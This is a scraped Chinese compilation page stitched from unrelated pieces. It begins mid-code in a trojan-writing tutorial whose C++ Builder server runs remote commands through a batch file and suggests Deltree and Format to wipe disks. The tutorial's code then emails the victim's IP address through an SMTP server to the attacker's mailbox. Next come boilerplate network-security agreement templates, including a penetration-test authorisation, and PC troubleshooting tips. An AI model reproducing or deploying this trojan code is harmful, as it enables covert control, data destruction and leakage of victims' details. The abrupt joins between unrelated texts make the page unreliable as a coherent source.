file://返回「Fail By Open File」的信息
goto END;
file://跳到END
}
}
fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);
file://寫入欲執行的命令
fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);
file://寫入換行符
fclose(fp);
file://關閉Win369.bat
system(TempFile);
file://執行Win369.bat
Socket->SendText("Success");
file://返回「Success」信息
}
}
你可以直接執行什麼Ping和Tracert之類的命令來進一步刺探目標機的網路狀況(判斷是否是一個企業的區域網),然後可以進一步攻擊,比如Deltree和Format命令。^_^

到此,伺服器程序的功能已全部完成,但還差容錯部分未完成,這樣才能避免程序因意外而崩潰。朋友,別走開!(未完待續)
木馬是如何編寫的(三)
武漢 周侃
上次已編寫完伺服器端的各種功能,但還差容錯部分還未完成,下面我們Go on! 其代碼如下(照敲不誤 ^_^):
{
END:;
Socket->Close();
file://關閉服務
ServerSocket1->Active =true;
file://再次打開服務
if (NMSMTP1->Connected) NMSMTP1->Disconnect();
file://如果SMTP伺服器已連接則斷開
NMSMTP1->Host = "smtp.163.net";
file://選一個好用的SMTP伺服器,如163、263、sina和btamail
NMSMTP1->UserID = "";
file://你SMTP的ID
try
{
NMSMTP1->Connect();
file://再次連接
}
catch(...)
{
goto NextTime;
file://跳到NextTime
}
NMSMTP1->PostMessage->FromAddress ="I don't know!";
file://受害者的Email地址
NMSMTP1->PostMessage->FromName = "Casualty";
file://受害者的名字
NMSMTP1->PostMessage->ToAddress->Text = "[email protected]";
file://將信發到我的郵箱,這一步很關鍵
NMSMTP1->PostMessage->Body->Text = AnsiString("Server Running on:") + NMSMTP1->LocalIP ;
file://信的內容提示你「伺服器正在運行」,並且告訴你受害者的目前的IP地址,以便連接
NMSMTP1->PostMessage->Subject = "Server Runn

『捌』 安全網路協議書

實用的安全網路協議書3篇

現如今,協議在生活中的使用越來越廣泛,簽訂協議可以保障自身的權益不被侵害。一般協議是怎麼起草的呢?下面是我為大家收集的安全網路協議書3篇,僅供參考,大家一起來看看吧。

安全網路協議書 篇1

甲方:提供單位______________

乙方:接入單位______________

中國教育和科研計算機網(cernet)是國家教育委員會直接領導管理的全國性教育和科研計算機網路,其目的是利用先進實用的計算機技術和網路通信技術,實現校園網間計算機連網、信息資源共享並與國際學術計算機網路互連,其服務對象主要是我國的教育和科研機構。中國教育和科研計算機網的所有接入單位必須與相應的網路提供單位簽署本項協議,並報上一級網路備案。

第一條總則

(一)中國教育和科研計算機網接入單位的所有工作人員和用戶必須遵守執行《中華人民共和國計算機信息網路國際聯網管理暫行規定》和國家有關法律法規,嚴格執行安全保密制度,並對所提供的信息負責。

(二)中國教育和科研計算機網的所有工作人員和用戶必須對所提供的信息負責。不得利用計算機連網從事危害國家安全、泄露國家秘密等犯罪活動,不得製作、查閱復制和傳播有礙社會治安和有傷風化的信息。

(三)在中國教育和科研計算機網上不允許進行任何干擾網路用戶,破壞網路服務和破壞網路設備的活動,這些活動包括(但並不局限於)在網路上發布不真實的信息、散布計算機病毒、使用網路進入未經授權使用的計算機、不以真實身份使用網路資源等。

(四)中國教育和科研計算機網在各級管理機構設立網路安全員,負責相應的網路安全和信息安全工作。

(五)中國教育和科研計算機網的各級網路管理機構定期對相應的網路用戶進行有關的信息安全和網路安全教育。

(六)中國教育和科研計算機網責成各級管理單位根據國家有關規定對於上網信息進行審查。凡涉及國家機密的信息嚴禁上網。

(七)中國教育和科研計算機網的所有用戶有義務向網路安全員和有關部門報告違法犯罪行為和有害信息。

(八)中國教育和科研計算機網的有關工作人員和用戶必須接受並配合國家有關部門依法進行的監督檢查。

第二條接入管理

(一)接入中國教育和科研計算機網的連網單位和用戶必須遵守中國教育和科研計算機網制定的規定和制度,按時繳納有關費用。

(二)中國教育和科研計算機網的接入單位和用戶不允許與其它互連單位私自連網。

(三)與中國教育和科研計算機網中止連網的接入單位和用戶單位必須把相應的ip地址退還中國教育和科研計算機網。

(四)中國教育和科研計算機網的接入單位必須嚴格執行《中國教育和科研計算機網管理辦法》的規定,不允許發展授權范圍以外的任何用戶。

(五)中國教育和科研計算機網的接入單位必須成立管理機構對於網路進行嚴格管理必須設立網路安全員,負責相應的網路安全和信息安全工作,保存網路運的有關記錄。網路安全員要指導系統管理員和用戶對於各自負責的網路系統、計算機系統和上網資源進行管理。

(六)中國教育和科研計算機網的所有接入網路必須與中國教育和科研計算機網或上一級接入網路簽署本協議並與自己的所有個人用戶簽署《中國教育和科研計算機網用戶守則》。各級網路管理機構必須保留相應的協議和守則備查。

第三條信息管理

(一)中國教育和科研計算機網的接入單位必須定期對相應的網路用戶進行有關信息安全和網路安全的檢查和教育。

(二)中國教育和科研計算機網的接入單位和用戶必須對於自己的上網信息負責。涉及國家機密的信息嚴禁上網。

(三)中國教育和科研計算機網的接入單位和用戶有義務向上一級網路和有關部門報告網路上的違法犯罪行為和有害信息。

(四)中國教育和科研計算機網的接入單位和用戶必須遵守知識產權的有關法律法規。

第四條懲罰條例

中國教育和科研計算機網對違反本條例的接入單位和用戶進行警告、停止網路連接直至訴諸法律。本單位作為中國教育和科研計算機網的接入單位同意遵守上述條款,如違反本協議,願意接受處罰並承擔法律責任。

甲方:_________________

蓋章:_________________

負責人簽字:___________

日期:_________________

聯系地址:_____________

郵編:_________________

電話:_________________

傳真:_________________

電子郵件:__________

乙方:_________________

單位名稱:_____________

蓋章:_________________

單位負責人簽字:_______

網路中心主任簽字:_____

日期:_________________

通信地址:_____________

郵編:_________________

電話:_________________

傳真:_________________

電子郵件:_____________

網路名稱:_____________

ip地址范圍:___________

域名:__________

連網方式:_____________

連網日期:_____________

安全網路協議書 篇2

互聯網的迅猛發展,以其豐富的內容、開闊的眼界、快捷的方式正逐漸地改變著人們的生活和交流方式。微信、微博、qq等網路工具已經成為信息傳播、人際溝通和文化交流的重要渠道。但是網上的不良、不實信息和不文明行為仍然存在,影響社會健康發展,對大學生的身心健康帶來極大的負面影響。

為提升全院師生的網路安全意識,倡導師生文明使用網路,構建安全、健康、和諧的校園網路環境,黨委宣傳部面向全院師生發出如下倡議:

一、自覺遵守《中華人民共和國憲法》、《中華人民共和國計算機信息系統安全保護條例》等國家有關法律、法規和政策,樹立正確的網路觀,抵制不文明行為,爭做文明網民。

二、自覺選擇上網安全通道。主動使用綠色上網過濾軟體,正確把握上網時間和上網時段,嚴格屏蔽不良網站,確保個人的身心健康。

三、自覺抵制網路低俗之風。做到不製作、不瀏覽、不轉載、不傳播。

四、增強網路道德文明意識。崇尚科學,追求真知,明確網上的是非觀念,使用網路文明語言,明辨網路信息真假,增強網路文明意識,爭做網路文明使者。

五、主動參與到抵制網路有害信息的行動中去,積極揭露和舉報網路不安全信息。

六、正確使用網路資源,堅決杜絕整日沉迷於網路游戲,禁止不良網路信息的傳播。

七、加強自我學習,學會自我約束,增強辨別謠言、抵制謠言的能力,逐步樹立成熟陽光的上網態度。

美好的網路環境需要我們共同創造,希望廣大師生能夠自覺、自律地養成安全、文明、健康的上網習慣。構建一個安全、和諧的校園網路環境!

XXX

時間:XXXX年XX月XX日

安全網路協議書 篇3

授權方(甲方):

地址:

電話:

被授權方(乙方):

地址:

電話:

簽訂此協議書即表明,乙方同意遵守此委託書的行為限制,甲方同意乙方對甲方所有權網站(含頁面、網站資料庫及內網)進行非惡意測試包括模擬入侵,模擬植入病毒、模擬盜取資料等等。此委託書是在平等自願的基礎上,依據《中華人民共和國合同法》有關規定就項目的`執行,經雙方友好協商後訂立。

一、關於測試

測試時間:__________________________________。

測試費用:__________________________________。

測試地點:___________________________________。

檢測單價:___________________________________。

測試人數:___________________________________。

檢測總費用:_______________________________。

測試項目:___________________________________。

實收費用:___________________________________。

測試目的:___________________________________。

二、關於付款付款方式

付款時間:本合同簽訂後甲方應支付全部評測費用至乙方,者驗收完成後甲方應支付全部評測費用至乙方。

三、雙方的權利與義務

1、乙方在測試過程中對甲方的所提供的網路結構、內部重要數據及資料進行保密,不得拷貝及留存甲方所有權網站(含頁面、網站資料庫及內網)內涉及商業秘密的數據。乙方測試所獲不涉及甲方商業秘密的數據由乙方所有。

2、甲方不得借測試之名,獲取乙方的非專利技術及商業秘密;或在測試過程中,用任何手段獲取乙方的非專利技術及商業秘密。

3、乙方的測試過程須在不影響甲方網站(含頁面、網站資料庫及內網)的正常運作的前提下進行。

4、測試結束後由甲方網路負責人檢查網站(含頁面、網站資料庫及內網)恢復狀況驗收,由乙方向甲方提交測試報告正本一份,甲方簽收驗收測試報告後,完成驗收。驗收無誤後,乙方對甲方所有權網站不負任何責任。

5、驗收結束後乙方應在____日內將甲方網站(含頁面、網站資料庫及內網)恢復到測試之前的狀態。

6、甲方對提供給乙方的測試環境的真實性及合法性負責以及對提供的所有權的網路應享有完全的產權。

7、甲方委託乙方對甲方所有權的網路(含頁面、網站資料庫及內網)進行網路安全測試,在不違反本授權委託書的前提下,乙方不承擔任何法律相關責任以及連帶責任。

8、如遇不可抗力導致測試無法如期進行、無法按時完成或終止的,乙方不承擔任何責任。

9、甲方對測試結果如有異議,於《測試報告》完成之日起____日內向乙方提出書面申請,同時附上《測試報告》原件及預付復檢費。甲方辦妥以上手續後,乙方將在收到預付復檢費___日內安排復檢,不可重復性試驗不進行復檢。

四、違約責任

1、測試過程中由於乙方具體測試行為導致甲方資料數據丟失,由乙方負責恢復數據;因此而造成的經濟損失,由乙方負責賠付。

2、測試過程中須有甲方網路負責人在場,甲方須積極配合乙方測試的進行。如因甲方原因導致測試無法如期進行、無法按時完成或終止的,由甲方承擔相應的違約責任。

3、如因乙方原因,導致測試進度延遲,則甲方可酌情提出賠償要求,雙方經協商一致後另行簽訂書面協議,作為本合同的補充。

五、爭議解決

雙方因履行本合同所發生的一切爭議,應通過友好協商解決;如協商解決不成,就提交___________仲裁委員會進行仲裁。裁決對雙方當事人具有同等約束力。

六、其他

1、本合同自雙方授權代表簽字蓋章之日起生效,自受託方的主要義務履行完畢之日起終止。

2、本合同未盡事宜由雙方協商解決。

3、本合同的正本一式兩份,雙方各執一份,具有同等法律效力。

甲方(簽章):

簽訂日期:________年________月________日

乙方(簽章):

簽訂日期:________年________月________日

『玖』 電腦中病毒了,連網路分層協議都改修改了,怎麼辦

病毒木馬干擾,那麼先查殺
可以騰訊電腦管家殺毒看看。它擁有雲查殺引擎、反病毒引擎、金山雲查殺引擎、AVIRA查殺引擎、小紅傘和查殺修復引擎等世界一流殺毒軟體內嵌殺毒引擎!保證殺毒質量,運行殺毒軟體進行全盤殺毒並使用系統修復功能,使用系統清理功能,按照自己的需求清理電腦內的垃圾文件。

其他情況
看看是不是線路老化(或者接觸不良),只能重新組線了,這個幫不了你,只能靠自己。
(1)MODEM故障。請觀察MODEM上的(ADSL或LINK)指示燈是否是常亮的狀態,您可以關閉MODEM電源2-3分鍾在打開(重啟MODEM),重新寬頻連接
(2)ADSL線路故障。一般情況下線路質量差:接頭多,有腐蝕或線路超長等都可能引起經常掉線:
(3)可能由於安裝的殺毒軟體或病毒防火牆防禦過高引起的,可修改防火牆設置或關閉、退出反防火牆。
(4)、有人佔用您的網路資源。這個可以用騰訊電腦管家——首頁——工具箱——無限安全助手查看下
(5)、DNS查下。騰訊電腦管家——首頁——工具箱——DNS優化,選114或8
(6)、網卡問題,你可以嘗試更新下網卡驅動試試,若不行,建議請專業人員進行檢查。